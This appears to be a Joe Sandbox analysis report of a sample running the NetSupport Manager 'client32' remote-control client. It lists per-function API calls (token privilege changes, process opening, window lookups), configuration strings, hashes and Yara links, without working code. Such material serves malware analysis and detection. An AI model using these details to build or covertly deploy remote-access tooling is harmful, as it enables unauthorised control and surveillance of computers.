Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: _memset
String ID: NBCTL32.DLL$_License$serial_no
API String ID: 2102423945-35127696
Opcode ID: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
Instruction ID: b704a80906741011c15d1468992a84ddd821d027e1e1ff2b1c0992d848e69eb8
Opcode Fuzzy Hash: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
Instruction Fuzzy Hash: 64B18E75E00209AFE714CFA8DC81BAEB7F5FF88304F148169E9499B295DB71A901CB90

Function 110310C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4

Strings

NSMWClass, xrefs: 11031103
Client32, xrefs: 110310C4
NSMWClass, xrefs: 110310EF

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID: Client32$NSMWClass$NSMWClass
API String ID: 3192549508-611217420
Opcode ID: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
Instruction ID: e21dedaf74b0f8cf59cf3be59171af9e644e6a1753dc25f7f597d2ad8de8aca1
Opcode Fuzzy Hash: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
Instruction Fuzzy Hash: 44F04F7891112A9FCB06DFA9D890A9EF7E4AB4821CB508165E82587348EB30A605CB95

Function 1109E910 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0106F958,0106F958,0106F958,0106F958,0106F958,0106F958,0106F958,111EEB64,?,00000001,00000001), ref: 1109E990
EqualSid.ADVAPI32(?,0106F958,?,00000001,00000001), ref: 1109E9A3

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateEqualInitialize
String ID:
API String ID: 1878589025-0
Opcode ID: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
Instruction ID: 8f268d00a2632c5decc73a479da56acc1190ac8ef7b7f04f8431c56e7d3a1b5e
Opcode Fuzzy Hash: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
Instruction Fuzzy Hash: 22217131B0122EABEB10DBA4CC81BBEB7B8EB44708F100469E919D7184E671AD00CBA1

Function 1109D440 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,F3EE1E80,00080000,00000000,00000000), ref: 1109D46D
OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 2349140579-0
Opcode ID: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
Instruction ID: 1acc50509d1dc0efa8f8b8857b060522b21de2b31161cc556941a9c494b785c9
Opcode Fuzzy Hash: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
Instruction Fuzzy Hash: AE015EB5640218ABD710DFA4CC89BAAF7BCFF44B05F10452DFA1597280D7B1AA04CB71

Function 1109D4D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64

Function 1102E640 Relevance: 241.6, APIs: 31, Strings: 106, Instructions: 1869windowthreadsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

GetSystemMetrics.USER32(00002000), ref: 1102E7C4
FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985

Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2

GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB

Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89

SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
CloseHandle.KERNEL32(00000000), ref: 1102EA6C
FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
DestroyCursor.USER32(00000000), ref: 1102EE7E
DestroyCursor.USER32(00000000), ref: 1102EE92
GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C

Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

DispatchMessageA.USER32(?), ref: 1102FA96
PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
SetWindowPos.USER32(000404A0,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
wsprintfA.USER32 ref: 1102FFA5
PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F

Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,F3EE1E80,00000002,75922EE0), ref: 1112820A
Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E

Strings

CLIENT32.CPP, xrefs: 1102E80A, 1102ED9B
Windows 2016, xrefs: 1102F92E
pcicl32, xrefs: 1102E954
Intel error "%s", xrefs: 1102ED48
Windows 8.1 x64, xrefs: 1102F86C
NSSWControl32, xrefs: 11030121
CabinetWClass, xrefs: 11030257
UseNTSecurity, xrefs: 1102FEBA
*BeepUsingSpeaker, xrefs: 1102F372
TraceIPC, xrefs: 1102FFFF
*ListenPort, xrefs: 1103009E
Info. Client running as user=%s, type=%d, xrefs: 1102EA22
DisableTSAdmin, xrefs: 1102F051
Windows 2012, xrefs: 1102F81B
V12.10.8, xrefs: 1102F98E, 1102F9C2
Windows 7 x64, xrefs: 1102F794
win8ui, xrefs: 1102EDE8
cl32main, xrefs: 1102E673
DisableRequestHelp, xrefs: 1102F217, 1102F2B5
UseIPC, xrefs: 1102FFCC
AlwaysOnTop, xrefs: 1102FD8F
Windows Vista, xrefs: 1102F6A9
V12.00.8, xrefs: 1102F987
Windows 8, xrefs: 1102F7C2
TCPIP, xrefs: 110300A3
Windows 10 x64, xrefs: 1102F8F7
Windows 8.1, xrefs: 1102F849
506407, xrefs: 1102FB8D, 1102FBE6, 1102FC27, 1102FD04
_debug, xrefs: 1102EDED, 1102EF46, 11030004
Windows 95, xrefs: 1102F4C4
Info. Client already running, pid=%d (x%x), xrefs: 1102E9CF
DisableHelp, xrefs: 1102F32D
NSMWControl32, xrefs: 110300F2
DisableConsoleClient, xrefs: 1102F039, 1102F0CE
Windows Millennium, xrefs: 1102F525
OS2, xrefs: 1102F567
MiniDumpType, xrefs: 1102EF41
AssertTimeout, xrefs: 1102EF23
hClientRunning = %x, pid=%d (x%x), xrefs: 1102EAAA
Session shutting down, exiting..., xrefs: 1102E7CE
gClient.hNotifyEvent, xrefs: 1102E80F
closed ok, xrefs: 1102EA5E
EnableSmartcardLogon, xrefs: 1102FE9F
Windows NT, xrefs: 1102F588
Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s), xrefs: 11030346
TracePriv, xrefs: 1102FA04
*PriorityClass, xrefs: 1102FD68
ShowKBEnable, xrefs: 1102F1B2
ScreenScrape, xrefs: 1102F128, 1102F152, 1102F17C
Info. Trying to close client, xrefs: 1102EA34
\Explorer.exe, xrefs: 110302FD
NSMWClassVista, xrefs: 1102E775
EnableGradientCaptions, xrefs: 1102EED0, 1102EEE7, 1102EF08
Windows 8 x64, xrefs: 1102F7EA
Bridge, xrefs: 1102EABD
Audio, xrefs: 1102F0A7, 1102F481
RestartAfterError, xrefs: 1102F003
Windows XP x64, xrefs: 1102F639
*ScreenScrape, xrefs: 1102FAD1, 1102FB1A, 1102FD4C
*StartupDelay, xrefs: 1102FA26
NSA.LIC, xrefs: 1102EB0B, 1102EB12, 1102EB35
Windows 7, xrefs: 1102F773
IsILS returned %d, isvistaservice %d, xrefs: 1102ECBA
Windows XP Ding.wav, xrefs: 1102F3E1
Windows XP, xrefs: 1102F5E3
Global\NSMWClassAdmin, xrefs: 1102FF9A
client32, xrefs: 1102EBE5, 1102ED82
Windows 2008, xrefs: 1102F710
DisableAudio, xrefs: 1102F069, 1102F08A, 1102F0F8, 1102F25F, 1102F2FD
View, xrefs: 1102EAD5, 1102EED5, 1102EEEC, 1102EF0D
DisableJoinClass, xrefs: 1102F1E7, 1102F285
Windows 2000, xrefs: 1102F5B5
Error x%x reading nsm.lic, sesh=%d, xrefs: 1102EB66
Error. Could not load transports - perhaps another client is running, xrefs: 1102FC63
_debug, xrefs: 1102FA09
Default, xrefs: 110300EB, 1103011A, 11030143
DisableJournal, xrefs: 1102F22F, 1102F2CD
Windows 2003, xrefs: 1102F60A
istaService, xrefs: 1102E6DB
LSPloaded=%d, WFPloaded=%d, xrefs: 1102EFBA
NeedsReinstall, xrefs: 1102EFDC
DisableReplayMenu, xrefs: 1102F1FF, 1102F29D
Windows 10, xrefs: 1102F8C7
DisableAudioFilter, xrefs: 1102F0A2, 1102F47C
Windows Vista x64, xrefs: 1102F6D7
Windows CE, xrefs: 1102F959
NSMWClass, xrefs: 1102E786, 1102E967, 1102EA74, 1102FF8F
NSTWControl32, xrefs: 1103014A
Ready, xrefs: 11030161
UseLegacyPrintCapture, xrefs: 1102F440
NoFTWhenLoggedOff, xrefs: 1102F315
NSM.LIC, xrefs: 1102EAFD, 1102EB9B
DisableRunplugin, xrefs: 1102F110
Windows 98, xrefs: 1102F4F5
Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s), xrefs: 110303E4
Windows 2012 R2, xrefs: 1102F898
*BeepSound, xrefs: 1102F3A5
Error. Wrong hardware. Terminating, xrefs: 1102ECE9
Windows 2008 x64, xrefs: 1102F73C
istaUI, xrefs: 1102E6F6
Windows Ding.wav, xrefs: 1102F3DA
DisableJournalMenu, xrefs: 1102F247, 1102F2E5
General, xrefs: 1102EF28, 1102F008, 1102F377, 1102F3AA
Windows 2003 x64, xrefs: 1102F672
EnableSmartcardAuth, xrefs: 1102FEDB
Client, xrefs: 1102EAC9, 1102EFE1, 1102F06E, 1102F08F, 1102F0FD, 1102F115, 1102F12D, 1102F157, 1102F181, 1102F1B7, 1102F1EC, 1102F204, 1102F21C, 1102F234, 1102F24C, 1102F264, 1102F28A, 1102F2A2, 1102F2BA, 1102F2D2, 1102F2EA, 1102F302, 1102F31A, 1102F332, 1102F445, 1102FA2B, 1102FAD6, 1102FB1F, 1102FCFA, 1102FD51, 1102FD6D, 1102FD94, 1102FEA4, 1102FEBF, 1102FEE0, 1102FFD1

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$506407$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
API String ID: 1099283604-2778481161
Opcode ID: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
Opcode Fuzzy Hash: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52

Function 1102DB00 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

506407, xrefs: 1102E145, 1102E30B, 1102E32F, 1102E33C, 1102E36C, 1102E3E1
TSMode, xrefs: 1102DEE0
Warning: Unexpanded clientname=<%s>, xrefs: 1102E1F3
WTSFreeMemory, xrefs: 1102E061
ListenPort, xrefs: 1102DF00
WTSQuerySessionInformationA, xrefs: 1102DF9E
client32 dbi %hs, xrefs: 1102E3C3
DisableConsoleClient, xrefs: 1102DE67
client32.ini, xrefs: 1102DD55
NSMWClass, xrefs: 1102DCE4
IsA(), xrefs: 1102E279, 1102E2F8
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102DFF4
client32, xrefs: 1102DE25
, xrefs: 1102E0B5
14/03/16 10:38:31 V12.10F8, xrefs: 1102E3BE
NSM.LIC, xrefs: 1102DB22
Error x%x reading %s, sesh=%d, xrefs: 1102DDB1
screenscrape, xrefs: 1102DF18
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102E3EA
%sessionname%, xrefs: 1102E289, 1102E2A2
$session$, xrefs: 1102E2B6
ts macaddr=%s, xrefs: 1102E01C
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102E410
%session%, xrefs: 1102E2CA
%s.%02d, xrefs: 1102E250
MacAddress, xrefs: 1102E02F
TCPIP, xrefs: 1102DF05
ClientName, xrefs: 1102E0E5
Wtsapi32.dll, xrefs: 1102DF2C
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102E274, 1102E2F3
%02d, xrefs: 1102E238
Client, xrefs: 1102DEE5, 1102DF1D, 1102E034

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: _malloc_memsetwsprintf
String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$14/03/16 10:38:31 V12.10F8$506407$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
